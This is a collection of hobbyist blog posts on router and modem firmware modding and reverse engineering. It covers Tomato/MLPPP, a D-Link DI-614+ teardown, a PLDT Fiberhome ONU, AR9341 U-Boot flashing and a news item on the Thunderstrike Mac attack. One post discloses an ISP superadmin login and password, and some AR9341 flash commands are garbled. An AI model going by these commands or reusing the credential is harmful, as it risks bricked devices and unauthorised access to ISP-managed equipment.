How-To Bonding Tomato/MLPPP Router

Tomato/MLPPP is a fork of the popular Tomato firmware (http://www.polarcloud.com/tomato) for consumer broadband routers. The primary goal is to enable users to bond multiple DSL connections using MultiLink PPP (MLPPP), and/or to circumvent Bell Canada's DPI-based throttling by using MLPPP on a single DSL line.

This documentation will only cover differences between this fork and the original Tomato firmware. For information on things not covered here, please consult the Tomato website (linked above).

Obviously, your ISP must support MLPPP in order for this firmware to be of any use. Currently, TekSavvy (http://teksavvy.com), Velcom (http://www.velcom.ca), Acanac (http://www.acanac.ca), Caneris (http://www.caneris.com), LOGIX (http://www.logix.ca), and NetFlash (http://netflash.ca) are known to support MLPPP, while Electronic Box (http://www.electronicbox.net) is currently working on enabling MLPPP support. If your ISP supports MLPPP and you can confirm that you have it working, please contact us and we'll add it to this list.

This video shows how to (real) bond two DSL lines using Tomato/MLPPP on a Linksys router. Your ISP must support MLPPP (few do).

Attached to this post, you will find v1.19-mp1 of the firmware, as well as the source.

This firmware has only been tested on the WRT54GL v1.1, but should run on the following routers:

- Linksys WRT54G v1-v4, WRT54GS v1-v4, WRT54GL v1.x, WRTSL54GS (no USB support)
- Buffalo WHR-G54S, WHR-HP-G54, WZR-G54, WBR2-G54
- Asus WL500G Premium (no USB support)

Download Tomato/MLPP firmware tomato-mlppp-1.19-mp1.rar

Download Zeroshell/MLPP firmware zeroshell-mlppp-mz1alpha1.tar.bz2

Attached to this post you will find the first release of Tomato/MLPPP, a fork of the popular Tomato firmware for various consumer broadband routers. It allows you to bond two or more DSL lines to multiply your speed, and also circumvents Bell's throttling even if you only have one DSL line.

Read More

D-Link DI-614+ Hacking / Reverse Engineering

Very basic stuff, just playing with hardware/firmware; don't expect to be inspired.

This is just a small site I put together after taking apart my [worthless] DI-614+ (now discontinued). This router is a piece of junk. It still works, but it has to be reset almost everyday and it's wireless signal strength is SUPER BAD. So one day I decided to take it apart to see what I can do with it and how it looks inside and here it is. This site is by no means the definitive location to get info on the 614+, there are other (probably better sites). But this is just my own little project.

The main goal of this is to get shell access (from the current firmware release) or even run Linux on the 614+ if at all possible. This page was started by me, for me, and with little to no research on the subject of 614+ hacking (which later turned out to be a pretty extensive topic, mostly regurgitated info and no real-deal linux on 614+ info). If this is new to you, enjoy, if you've seen this before, please feel free to move on.

Note: This is Revision B. So what you see here is for the LAST DI-614+ (discontinued).

CPU Info:
Conexant
Network Processor
CX82100-41
E363335.1
0318 PHILIPPINES
ARM

Other Info:
OEM ID: GL2422RT-1T7
ARM9 Conexant CX82100-41 168Mhz
Global Sun Tech GL2422RT-1T8 v1.1
1MB FLASH (29LV800BTC-90)
8MB RAM (ICSI IC42S16400-7T)
Ethernet (Marvell 88E6060)
Wireless TI ACX100 mini-pci

There is a document online (here) that says that Revision A of the 614+ can be flashed with Firmwares from TrendWare (TEW-311BRP), Eusso (GL2422-RT) and PheeNet (WBIG-104b+) routers which all originate from Global SunTechnologies in Taiwan. It also says there is currently no firmware for Revision B that can be substituted into the 614+. The main point I was looking was for confirmation that there is a telnet config mode, and there is. Now I guess it's my job to keep researching telnet config mode for RevB of the 614+. There has to be a way to enable this mode. If not, I'm going to CONSIDER flashing my 614+ with a firmware from one of those routers but with updated ARM9 processors (if those even exist.)

Playing with the Firmware:

The firmware can be opened with WinRAR to extract "Nml.mem" which seems to be the main FlashROM data for the Connexant chip?? I'm still new at embedded stuff hacking. But looking around inside the image file, there seems to be alot of cool stuff that can be done with a little hex-editing! I'm so excited.

Now to figure out the file format of Nml.mem....extracting .GIF files is pretty easy though, finding the start and end of the files is pretty damn easy as they are stored one after the other (GIF89a - 0x47 0x49 0x46 0x38 0x39 0x61 signals the start of a GIF file and 0x00 0x3B seems to signal the end if I recall). If you want to extract the files to modify them just use a program that extracts file formats out of files (I forgot the name of an old DOS program I had that did this..) Anyway here is an example of a GIF file extracted straight from Nlm.mem (which is inside the .bin):

Editing this while leaving the colors/size the same is very easy. Stuffing it back into Nlm.mem is yet untested......TO DO.

UPDATE:

I managed to extract all the GIF's and JPEG's stored in the firmware image (22 GIFS, 100 JPEGS). Now to extract the HTML and Executables stored in Nlm.mem.

Interesting strings inside the Firmware:

1) Looking for all the text-strings in "Nlm.mem" we find this:

WDB8WvbXdHtZyM8Ms2RENgHlacJghQyG

Previous experience with software protections and just lots of reading tells me that this looks like a hash. Could the password for the router be computed against this hash? I dunno. I would like to know though...Then to find a way to extract the encrypted hash out of the router memory...ugh..never mind, whats the point?

Also inside that same file is this string: "dbgout.txt" I'd like to be able to access this and see what it has.

2) And now for the most useless stuff inside the Nlm.mem file:

Hey Moe, it dont woik. NYUK NYUK NYUK NYUK *bop* Owww!

YES, this was taken out of Nlm.mem! I have NO IDEA why it's there (crazy programmers). Or when it shows (possibly through a console error message).

3) Here is another interesting string:

This is a strange problem.

YES, this was taken straight out of Nlm.mem. Heh, just had to put it up here.

4) HELLO!!!%#@ Look what we have here:

GST Telnet server v1.0
!!! idle timeout (5 minutes) !!!
TELNET: bind error
TELNET: open socket fail
TELNET: setsockopt SO_REUSEADDR error

A little further own down the file we see this:

Remote Managment Telnet Server

Looks like there IS a telnet server on this little sucker!!! I HAVE TO FIGURE THIS OUT!!

5) Here is some more interesting stuff, looks like the MiniPCI card has a PRISM2 chipset (or not?) and ACX100TSK (on the chip it says AGX100AGHK) is the Texas Instruments wireless network chip (there's a project to write Linux drivers for the ACX100 chipset at http://acx100.sourceforge.net/ but I won't bother taking out the miniPCI card at this moment) Here is the FCC-ID page that has a ton of info on the ACX100 card including pictures HERE (PDF file) and manual here:

nInitializing Wireless Interface...OK !
Send WIRELESS_INIT_FAIL_TRAP
Initializing Wireless Interface...Failure !
Reinit WLAN driver (2) !
PRISM2_AP
Repeater disconnects with AP...
Start Easy backup mode.
802.11 Ad Hoc starts. BSSID = %02x:%02x:%02x:%02x:%02x:%02x
AP Client disconnects with AP.
Start Complex backup mode.
restore apclient timer
ACX100TSK
Michael error : Stop.
Check 22m rates
Repeater connects with AP. BSSID = %02x:%02x:%02x:%02x:%02x:%02x
AP Client connects with AP. BSSID = %02x:%02x:%02x:%02x:%02x:%02x
802.11 Ad Hoc connects with other. BSSID = %02x:%02x:%02x:%02x:%02x:%02x Channel:%d
AP is swapped by backup AP
Repeater disconnects with AP.
AP Client disconnects with AP.
Repeater disconnects with AP.
AP Client disconnects with AP.
ping complete
Memory Block Free Error!
Reinit WLAN driver (4) !
Reinit WLAN driver (5) !
Reinit WLAN driver (1) !
Reinit WLAN driver (3) !
.hteCPU did not start after boot from flash
Failed to download firmware to the ACX100
Timeout waiting for the ACX100 to complete Initialization

Here is some info gathered from the FCC website about the miPCI card in MY DI-614+:

• Prodect Name: Wireless 22Mbps Mini PCI Card
• Model Name: GL2422MP-MT FCC ID: KA2ACX100

6) Here we see that this little sucker runs the ThreadX RTOS:

Copyright (c) 1996-2000 Express Logic Inc. * ThreadX ARM7/Green Hills Version G3.0f.3.0c

Ok the 614+ seems to run Express Logic's ThreadX Real-Time Operating System (www.expresslogic.com) on ARM's (www.arm.com) ARM9 (the RevB has an ARM9, but this looks like it is backwards compatible with the ARM7 specs??) processor from a little research it looks like Green Hills Software Inc (www.ghs.com) licensed ThreadX from Express Logic, or I could be wrong..

Final outlook: After looking through Nlm.mem I am 100% sure there HAS to be a way to enable DEBUG MODE/REMOTE TELNET SERVER. Whether it's possible by some debugging/hex editing or something, I don't know. But there are just too many clues to have it any other way. I wish I had an ARM debugger....

This page (http://www.dlink.pl/presse/artikel_detail.asp?docid=DLPI020902) has a mention of "Web-based and Telnet configuration" on the 614+ I'd like to know how to enable telnet configuration...

Read More

CD-R King CW-5356U Tomato Firmware

I cobbled together a network-attached storage (NAS) at home to enable everyone in our house to have a shared directory for school, work and personal files. This shared directory is also accessible from outside the house – like a rudimentary personal “cloud” for our family.

It wasn’t complicated — you can go to my blog for the article on the process — because the setup was a matter of connecting an old portable USB drive to a cheap CD-R King wireless router and setting things up using a visual interface.

The magic sauce in the setup is the Tomato firmware that runs on the router. Tomato is a Linux-based router firmware that allows you to manage your device on such things as filtering and setting quality of service rules for certain types of connections so that people browsing websites don’t experience crawling connection when someone downloads using a torrent.

The Tomato firmware that comes with the CD-R King router that I use, a CW-5356U model, simplifies the setting up of a NAS by allowing you to plug a portable drive into the router’s USB port. You can set the system to auto-mount any drive that you plug into it and make it shareable in your network. You can also designate a password for your shared drive so that not everyone who connects to your Wi-Fi can access it.

The system also assists you in setting up an FTP (file transfer protocol) server that will allow you to access that drive outside of your network. You can, with the setup, access your home files from the office or even on the go.

Promise of open source

What’s even more fun is that you can view movies stored on your portable drive over your iPhone or iPad.

The router also has a facility that will allow you to connect a printer to its USB port to turn it into a network printer. It also allows you to set up complex rules that can, for example, bar your children from accessing Facebook during class days but allow you to continue using the social network.

For just P1,280, the wireless router trumps the features of branded and more expensive models.

I think the CD-R King router illustrates the promise of open source software.

Tomato firmware is open source, meaning it is released under a license that encourages sharing the software and collaborating to make it better. Any wireless router manufacturer can use the Tomato firmware for its product. By using Tomato, the manufacturer no longer has to spend to develop and maintain its own firmware. Instead, it can just concentrate on the manufacturing side of the business.

By using Tomato, CD-R King is able to manufacture a router that’s really top-class for such a low price.

But if there’s an open source project that’s really making such a huge impact, it’s Android. There are phones in the market today that are powerful and advanced and yet cost less than P10,000. Cherry Mobile’s Flare, for example, costs just P3,999 but comes with formidable specs: Android ICS, 1.2 Ghz dual-core processor, five-megapixel camera and dual-SIM capability. It was such a hot item during the holidays that stocks were wiped out.

Read More

Macs undetectable virus that "can't be removed"

A security researcher has discovered a way to infect Macs with malware virtually undetectable and that 'can't be removed.'

The attack, which has been called Thunderstrike, installs the malicious code into the Boot ROM of the system via the Thunderbolt port.

Trammell Hudson, who works for hedge fund Two Sigma Investments and is also the creator of the Magic Lantern open-source programming environment for Canon DSLRs, discovered the vulnerability after his employer asked him to look into the security of Apple notebooks.

"A few years ago we were considering deploying MacBooks and I was asked to use my reverse engineering experience to look into the reports of rootkits on the Mac to see if it was possible to patch the firmware to be secure against them," wrote Hudson in a summary of the vulnerability.

After initially discovering that the Boot ROM could be tampered with if the notebook was physically dismantled to give access to the chip soldered onto the motherboard, he then refined this technique so the attack could be carried out via the system's Thunderbolt port.

"It turns out that the Thunderbolt port gives us a way to get code running when the system boots," Wrote Hudson. "Thunderbolt brings the PCIe bus to the outside world and at boot time the EFI firmware asks attached devices if they have any Option ROMs to be run."

Hudson discovered that he could use a modified Apple gigabit Ethernet Thunderbolt adapter to carry out the attack.

"Since it is the first OS X firmware bootkit, there is nothing currently scanning for its presence. It controls the system from the very first instruction, which allows it to log keystrokes, including disk encryption keys, place backdoors into the OS X kernel and bypass firmware passwords," Hudson said.

And once it is on your system, it is incredibly hard to remove.

"It can't be removed by software since it controls the signing keys and update routines. Reinstallation of OS X won't remove it. Replacing the SSD won't remove it since there is nothing stored on the drive."

"The classic 'evil-maid' attacks also are feasible. Given a few minutes alone with your laptop, Thunderstrike allows the boot ROM firmware to be replaced, regardless of firmware passwords or disk encryption," explains Hudson. "So while you are getting breakfast at the hotel during a conference and leave the machine in your room and house-cleaning comes by to make up the bed, install the firmware backdoors, and replace the towels."

According to Hudson, Thunderstrike "is effective against every MacBook Pro/Air/Retina with Thunderbolt."

Fortunately, Hudson reports that Apple is working on an update that will prevent malicious code from being written to the Boot ROM via the Thunderbolt port. However, this update would not protect the system from having the Boot ROM tampered with directly.

One defense against this would be to paint over the case screws with glitter nail polish and take close-up photos of the seal you created. The glitter in the nail polish sets into a random pattern that would be impossible to replicate, and as long as you keep the photos safe, you can make sure they screws haven't been messed with.

via www.zdnet.com

Read More

PLDT Fiberhome ONU AN5506-04-FA RP2627 Update Failed

Just last month  I have been reading at kbeflo's gist.github again so many Netizen shouting about their PLDT Fiberhome AN5506-04-FA/T ONU being remotely updated by the country's Giant Telco ISP. It was me who first disclosed on this blog the PLDT "fiberhomesuperadmin " account privilege to access the PLDT Fibr ONU Super Admin and later on TipidPC.com who gave the password sfuhgu that everybody's enjoyed the tweaking and manipulating of their own ONU device. Now the sadness and sorrow came again to all the PLDT Fibr Subscriber because of the so called firmware updates from RP2627 to RP2631 that gives another headache, I know for Shifu out there like you it won't be as hard for you to locate the script even without any use of web developer tools but to a newbie like me will be painful looking for the code.

I have been enjoying my PLDT Fiberhome ONU AN5506-04-FA RP2627 without any patches and still intact until today 6pm my little Princess complaining that her mini iPad is not working anymore until I notice that the internet connection was interrupted. There was no signs that the red LEDs turns ON on the PLDT ONU until I login and see to it if the WAN connection really went down. On the Status Main Menu my PLDT ONU AN5506-04-FA is still intact and NOT being updated to RP2631 but when I check on my BroadBand settings, my ONU WAN Type is now being change from INTERNET to TR069_INTERNET. On my ONU VLANID is still the same as it is 1030 and the priority is still 0 but what happen to my WAN connection type from Route mode is no longer possible to scroll it to Bridge mode. What the F*ck, go and eat your PLDT Fiberhome ONU device. Yeah you are right! now you glued it on the Web User Interface, do you think that I won't be possible on the CLI and what about the web developer tools it can be unhide, PITY on your Graphical Interface.

This is another disaster to the PLDT Fibr Subscriber who owns this kind of ONU Fiberhome AN5506-04-FA/T, on kbeflo's at gist.github thread someone is already asking for RP2627 firmware I don't know if they will be able to upload the firmware onto the ONU device if they have it on their hand. On this Blog someone also commented and ask me the RP2627 firmware, I can upload it to them I have the list of the AN5506-04-FA frimware from RP2610 to RP2627. I have written on this Blog that best and easy way to backup the AN5506-04-FA firmware on Windows machine is via winSCP you can just click and drag the files.

I will leave it as it is today until the PLDT Engineering Technical Team done their patches and firmware updates remotely to all the PLDT Fiberhome ONU devices, soon to follow the post on how to undo the PLDT Fiberhome ONU AN5506-04-FA/T from RP2631 to RP2627 again. I know its hurts really when you are really inlove to your ONU device firmware RP2627 and suddenly someone just took it away without any prior notice. If possible I will write a tutorial on how to update the AN5506-04-FA/T frimware from RP2627 to RP2631 or vice versa from RP2631 to RP2627.

Read More

Exploring D-Link DIR-320 networks with Oleg's firmware or what are vlan0, vlan1, eth0, eth1, br0?

What is the device?

It's a D-Link wireless router (4MB flash, 32MB RAM and processor Broadcom 240 MHz) with almost the same configuration as ASUS WL500g Premium (8MB flash, 32MB RAM and processor Broadcom 266MHz), but costs much lower.

Why do I need this wireless router?

Because I want to build a wireless home network with Internet connection (PPPoE) for laptop, netbook (HP 2133) and a telephone (Nokia E63), which supports Wi-Fi. I need the USB port for printing, and in the future ---scanning, USB harddisks, networked web camera, 3G or WiM modems etc.

What is the Oleg's firmware?

It's Linux-based custom firmware for ASUS WL-500gx/WL-550gE/WL-500gp/WL-500W/WL-320gE/WL-320gP/WL-330gE/WL-500gp V2/WL-520gU. There isn't much thing to do with the manufacture's firmware. Instruction of installation (flashing) of the Oleg's firmware on DIR-320 can be found in my blog (in English) or wl500g.info (in Russia).

What are there inside the router with Oleg's firmware?

After flashing the device with Oleg's firmware, you can configure Internet connection, Wireless, etc by web brower interface. Don't forget to turn on SSH server (dropbear). After that login and explore:

$ ifconfig

br0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00

inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1122700 errors:0 dropped:0 overruns:0 frame:0

TX packets:1113191 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:367622803 (350.5 MiB) TX bytes:586264798 (559.1 MiB)

eth0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1393411 errors:0 dropped:0 overruns:0 frame:0

TX packets:1113648 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:935119976 (891.7 MiB) TX bytes:655661617 (625.2 MiB)

Interrupt:4 Base address:0x1000

eth1 Link encap:Ethernet HWaddr 00:90:4C:C1:00:00

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:619887 errors:0 dropped:0 overruns:0 frame:19671

TX packets:683607 errors:122 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:44888939 (42.8 MiB) TX bytes:305171776 (291.0 MiB)

Interrupt:13 Base address:0x5000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MULTICAST MTU:16436 Metric:1

RX packets:40152 errors:0 dropped:0 overruns:0 frame:0

TX packets:40152 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:3718052 (3.5 MiB) TX bytes:3718052 (3.5 MiB)

ppp0 Link encap:Point-to-Point Protocol

inet addr:93.88.141.40 P-t-P:93.88.128.253 Mask:255.255.255.255

UP POINTOPOINT RUNNING MULTICAST MTU:1492 Metric:1

RX packets:647631 errors:0 dropped:0 overruns:0 frame:0

TX packets:661658 errors:0 dropped:44 overruns:0 carrier:0

collisions:0 txqueuelen:3

RX bytes:545701887 (520.4 MiB) TX bytes:346044024 (330.0 MiB)

vlan0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:504058 errors:0 dropped:0 overruns:0 frame:0

TX packets:443975 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:334078103 (318.6 MiB) TX bytes:292107592 (278.5 MiB)

vlan1 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00

inet addr:10.13.5.65 Bcast:10.13.5.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:889353 errors:0 dropped:0 overruns:0 frame:0

TX packets:669673 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:575960475 (549.2 MiB) TX bytes:363554025 (346.7 MiB)

Physically the wireless router D-Link DIR-320 has a 2-port router and a 6-port switch. One port of the switch is connected to the router, another one is the WAN port. The other 4 ports of the switch are the LAN ports on the back of DIR-320. The remaining port of the router is connected to the WLAN adapter.

Inside the switch exist two Virtual LANs (VLans) --- vlan0 and vlan1. vlan0 contains ports 4 LAN ports (ports 1--4) and one router port (port 6). vlan1 contains WAN port (port 0 or "Internet Port" written on the back) and router port (port 6).

There is a bridge (br0) bridging eth1 (WLAN) and eth0 (switch port 0). This bridge allows WLAN and LAN to share the same IP address. When the router needs to send information to clients, it broadcasts out br0 (to eth1 and vlan0). When we need to send information to Internet (WAN), router send directly to vlan1.

$ brctl showmacs br0

port no mac addr is local? ageing timer

2 00:1b:9e:7f:96:38 no 0.77

2 00:21:00:62:c1:86 no 0.00

2 00:23:b4:ce:cd:4e no 36.52

1 00:90:4c:c0:00:00 yes 0.00

2 00:90:4c:c1:00:00 yes 0.00

2 02:90:4c:c1:00:00 no 29.23

Via phanvinhthinh

Read More

AVR JTAG Debugger/Programmer

AVR JTAG : Credit to IsoJtagIsp for schematic and bootloader. I've been modified a schematic from IsoJtagIsp by remove USB interface from schematic because I'd like to use AVR JTAG with USB2RS232 and serial port.

Download bootloader onto ATMEGA16, If you don't have a AVR programmer I recommended a simple programmer from Ponyprog, because Ponyprog need a few component for build a AVR programmer. If you already have a AVR programmer you can use it to download bootloader. If you're using Ponyprog the fuses should look like this.

• IsoJtagISP_1.5_3.6864MHz.hex
• IsoJtagISP_1.5_7.3728MHz.hex
• IsoJtagISP_1.5_8.0MHz.hex
• IsoJtagISP_source.rar

Once the bootloader is programmed, the next step is upgrade JTAGICE firmware onto ATMEGA16 by using AVR Studio.

1.] Set jumper to JTAG mode and powered to the board, then the Power LED should come on and Act LED should be blink.

2.] Open AVR studio select Tools menu and select AVR Prog, AVR Prog connected with AVR JTAG look like this.

AVR JTAG firmware upgrade.

3.] Click on Browse button and choose AVR JTAGICE firmware for upgrade like C:\MCU\Atmel\AVR Tools\JTAGICE\Upgrade.ebn

4.] Click Program button and wait until upgrading complete.

5.] Reset board by press reset button and wait until Act LED stop blink.

5.] Return to AVR studio, select Tools menu->Program AVR->Connect, if firmware upgrade complete you can see JTAG ICE dialog look like this.

6.] Testing AVR JTAG with ATMEGA32, Pin connection between AVR JTAG and MEGA32 such as
7.] TCK_SCK -> TCK
8.] TDO_MISO -> TDO
9.] TMS_RST -> TMS
10.]TDI_MOSI -> TDI

This is a simple source code for testing JTAG, If you don't have compiler you can download WinAVR from winavr.sourceforge.net it's free compiler. After WinAVR installed, create new project in AVR studio by select Project menu->New project, then you can see Create new project dialog, select AVR GCC in Project type, fill project name you want to create into Project name box, fill main into initial file box, final click finish button and put this code into main.c.

/***********************************************************************
*
* File : main.c
* Desc : Blink LED on PB0
* Compiler : AVR GCC
* Author : Jirawat Kongkaen
* Website : .
*
***********************************************************************/

#include

void delay(unsigned int delay);

int main(void)
{
DDRB = 0xFF; // Port B as out put

for(;;)
{
PORTB |= _BV(PB0);
//delay(50000);
PORTB &= ~(_BV(PB0));
//delay(50000);
}

return 0;
}

void delay(unsigned int delay)
{
while(delay) delay--;
}

Before start debugging you have to compile main.c first by select Build->Build or press F7 on keyboard, now let start debugging by select Debug menu->Start Debugging of click Start Debugging button, look like this.

Connection between AVR JTAG and ATMEGA32 is connected (see below figure), Now let's start debugging by click Step into button or press F11, LED at PB0 will come On/Off.

Testing had finished and you can use AVR JTAG for debug/program AVR microcontroller. I will explain about how to AVR JTAG working, if you set JP1 to JTAG mode and power on the board, AVR JTAG wait for firmware upgrade until Act LED come off, You can upgrade firmware at this sequence. After Act LED com off AVR JTAG ready to use. If you set JP1 to ISP mode you should be able to program:

Bread board with AVR JTAG and ATMEGA32

Read More

AR9341 Router TTL Line Brush Machine

Recently, I have a batch of OEM PoE routers that do not have a USB interface. It is just used to study the TTL flash machine.

Then connect the USB to TTL. Note here that some boards will be incompatible with garbled characters. You can try to change the baud rate. If not, just change a USB to TTL board.

The computer uses SecureCRT, serial port connection, there is no character on the connection, then power on the router, the screen starts to display UBOOT, press any key to interrupt, some press TPL interrupt or ctrl + c interrupt, I first flash breed

These software will be provided below to download, understand the command of FLASH before brushing

2MB FLASH


Flash programmer firmware: tftp 0x80000000 full.bin
erase 0x9f000000 + 0x200000
cp.b 0x80000000 0x9f000000 0x200000 flash
uboot:
tftp 0x80000000 uboot.bin
erase 0x9f000000 + 0x20000
cp.b 0x80000000 0x9f000000 0x20000 flash
fw:
tftp
0x80x9fwfc.
cp.b 0x80000000 0x9f020000 0x1c0000
brush art:
tftp 0x80000000 art.bin
erase 0x9f1f0000 + 0x10000
cp.b 0x80000000 0x9f1f0000 0x10000


4MB FLASH

Flash programmer firmware: tftp 0x80000000 full.bin

erase 0x9f000000 + 0x400000

cp.b 0x80000000 0x9f000000 0x400000 flash

uboot:

tftp 0x80000000 uboot.bin

erase 0x9f000000 + 0x20000

cp.b 0x80000000 0x9f000000 0x20000 flash

fw: tftp 0x80x9 fw0f0f3

cp.b 0x80000000 0x9f020000 0x3c0000

brush art:

tftp 0x80000000 art.bin

erase 0x9f3f0000 + 0x10000

cp.b 0x80000000 0x9f3f0000 0x10000


8MB FLASH

Flash programmer firmware: tftp 0x80000000 full.bin
erase 0x9f000000 + 0x800000
cp.b 0x80000000 0x9f000000 0x800000 flash
uboot:
tftp 0x80000000 uboot.bin
erase 0x9f000000 + 0x20000
cp.b 0x80000000 0x9f000000 0x20000 flash
fw:
tftp
0x80x9 fw.f02
cp.b 0x80000000 0x9f020000 0x7c0000
brush art:
tftp 0x80000000 art.bin
erase 0x9f7f0000 + 0x10000
cp.b 0x80000000 0x9f7f0000 0x10000


16M FLASH: flash address from 0x000000 ~ 0x0FFFFFF
ttl access flash address from 0x9F000000 ~ 0x9F0FFFFFF


The network cable is connected to the router lan port, the computer configuration is set to 192.168.0.2, the mask is 255.255.255.0, and the gateway is 192.168.0.1

Open tftp in my software package, select the network card connected to the router's network cable, it will normally display the IP 192.168.0.2, click "Show Dir" contains a firmware of breed-ar9341.bin, first flash him, execute the following command

setenv ipaddr 192.168.0.1

setenv serverip 192.168.0.2

tftp 0x80000000 breed-ar9341.bin

When done appears, it means that the brushing is successful, and then execute

erase 0x9f000000 + 0x20000

cp.b 0x80000000 0x9f000000 0x20000

When done appears, flashing in is successful. Unplug the router and plug it in again. SecureCRT displays the Breed boot and press any key terminal. At the same time, you can see that the default lan port address is 192.168.1.1

Connect the computer browser to 192.168.1.1, then you can directly use the Breed Web


Enter 192.168.0.1 in the address bar of the browser and select the firmware upgrade. Here you should save the original firmware under backup. You can configure openwrt after the flashing is completed.

Software download address:

https://pan.baidu.com/s/1Z7PkN8ROxpDITdRZHgw3nQ

Extraction code: be5m

Read More

myBRO To Globe : How-To Configure Green Packet DV-235T

On my previous post I have written on How-To upgrade the myBRO DV-235T of Green Packet to the Stock Firmware. Today, I wanted to share to my beloved guest, commenters and visitors on How-To configure the Green Packet DV235T aka myBRO to be able to hook it to Globe network. This experiment is not an exploit or an ethical but only for Educational purposes only.

The myBRO DV235T Green Packet 4G WiMAX wireless modem router that is built-in with WLAN b/g that you can find on forums, online store, is a Smart/PLDT WiMAX CPE with customized firmware supplied by Green Packet Berhad, Malaysia the manufacturer.

Here's how to DIY, first you must have to update the myBRO DV-235T to the Green Packet stock firmware aka (web_update-2_3G-v2.10.14-g1.0.4-gp.tar), if you don't have the firmware, download it before you proceed to this guide. Once you have updated your myBRO to the stock firmware then you are now ready to do this stuff.

On your myBRO DV235T graphical user interface (gui) you will see the WiMAX Menu on  top of it, on the left Sub-Menu click the Scanner button to be able for you to edit/configure/input the Globe Telco 4G WiMAX ISP frequency just follow the screenshot above.

Next step is setting up the correct Username, Password and the Identity, this is just identical to Huawei 4G WiMAX wireless modem router CPE same thing you will do on this Authentication, except the issue here is the length of the Username character is limited to "maxlength=32". Meaning the generatedmacaddress@globelines.com.ph is not possible to be place or to be input on the given space provided. The trick to be able to expand the "maxlength=32", just point your mouse on your myBRO DV-235T gui then right-click you will be prompted with Inspect element (Q) by then you can now edit to what ever maxlength=?  you will wish as you have notice the above grabbed image. Hopefully you will now able to input your 34 character (generatedmacaddress@globelines.com.ph).

There you are, your generatedmacaddress@globelines.com.ph is now on its placed! On the below Option just tick the Auto Prepend Auto Mode and the Ignore Cert Verification. By the way you must not forget to click also the Apply button on every changes you have made to save your works.

Opps! we are not done yet, open your putty or telnet, you must use the this following command below to be successfully your myBRO DV-235T can enter the Globe Telco ISP network.

enable enter

router enter

wan mac (your mac address) enter

commit enter

exit enter

reboot enter

It only proves that myBRO DV-235T of Green Packet 4G WiMAX wireless broadband modem router CPE can be use on Globe Telco ISP. This tweaks can be found on Google, Forums and other popular blogs. Its not my intention to alter or deform this device, since the stock firmware can just be download anywhere and it is being seeded on different mirror sites don't flame on me about this stuff.

Feel free to use this article for your educational used, I do not guarantee or warranty if your device/CPE will get bricked. Enjoy!

Read More

ZTE ZXDSL 931WII Firmware TFTP Upload

Recently, I decided to upgrade my ADSL subscription to VDSL, and the deal included a ZTE ZXDSL 931WII CPE box (VDSL2 modem + NAT + WLAN AP). Attached with the box were instructions stating that configuration settings could be managed from a private web page provided by the ISP. And was one able to do so? Of course not. Much to my annoyance, it also turned out that all ‘outside the box’ local configuration had been disabled in the firmware (no response to LAN http, ssh or telnet). So, a quick call to the ISP helpdesk:

“Hi! I upgraded to blablabla and would like to configure it but there’s nothing else on the remote admin panel than a save -button”

“Ok let me check”

“It doesn’t accept any http or telnet connections to the local admin interface either..”

“What would you like to configure?”

“Well you know, the usual stuff people configure on their home router; static IPs, port forwarding, admin password etc..”

“Hmm well I can see that implementing the feature is pending, but I can check details about this with someone. Is it ok if I text you shortly? Kthxbye!” *CLICK*

Some minutes later, there’s a text on my mobile saying “There is no known schedule for adding remote configurability for the current firmware at this time”. W-T-F and thanks a fucking bunch! :D

Seriously: Do they think that I’m going to run this box in my home without having any access to feature configuration?

Sure I can understand that, given the increasingly technical times we live in, the need might arise for the ISP to be able to remotely check the CPE configuration of some less-technically-inclined subscriber using their ACS server. But why-oh-why disable all local configuration options? Surely, the option of configuring the hardware could be kept available to those who wish to do so?

Not happy with the situation at all, I decided it was time to take a look whether local configuration could be performed from inside the box.. I’d rather have a bit of my own fun with the box instead of paying xx€ for queuing +15 minutes on the phone just to be walked through a “Did you check cable connections” check list (or whatever). Should my “playtime” result with a bricked box, no problem. The ISP can then have the box back accompanied with a “the lights just went out” fault description and I’ll go buy something more decent :)

After opening the enclosure, board gets the usual ‘scanning glance’.. and what do you know?! On the front edge close to the status LEDs there’s a standard 4-pole pin header. Easy guess; one pin for GND, one for +VDC, one for RS232TxD and one for RS232RxD. Sort of screaming “hello, I’m a serial port” all over. Not that it turned out to be exactly plug’n’.. err.. hack.

As +3.3V logic levels are used, a RS232 line level driver is needed in-between to interface with a standard serial port. I have plenty of Intersil HIN202 transceivers available, so that’s what I used and will discuss here. Any other RS232 transceiver (f.e.x something by Maxim) should work as well. If you have some other chip, just pay attention to its datasheet / app notes how to connect it.

Basic application of HIN202. Image courtesy of Intersil.

What I put together was rather directly lifted from the HIN202 datasheet (picture above). HIN202 actually uses +5V logic levels, but as the specced low/high signal transition thresholds are 0.8V / 2.0V (respectively), the chip works just fine with 3.3V signal levels too. What of course needs to be accounted for is the RxD output connecting to the CPU. Remember, that the transceiver outputs +5VDC high signal state whereas the CPU prefers 3.3V! Thus, a series resistor is needed to lower the signal level. My choice here was 10k.

As you can see from the datasheet schematic above, electrolythic capacitors are used for the 10V on-chip voltage charge pumps. So why does my circuit use regular ceramic (1206 SMD) capacitors? Well, being the lazy me with certain things (like doing a quick hack such as this) is really about what suitable is ‘on the desk’.. and here, it was the ceramic capacitors. I have no idea if the electrolytics allow the pumps to work better in some specific conditions, but at least on my desktop/living room setup the RS232 connection works just fine like this. So, leave it at that and move on.

Lower side connections of the RS232 transceiver

Upper side connections of the RS232 transceiver

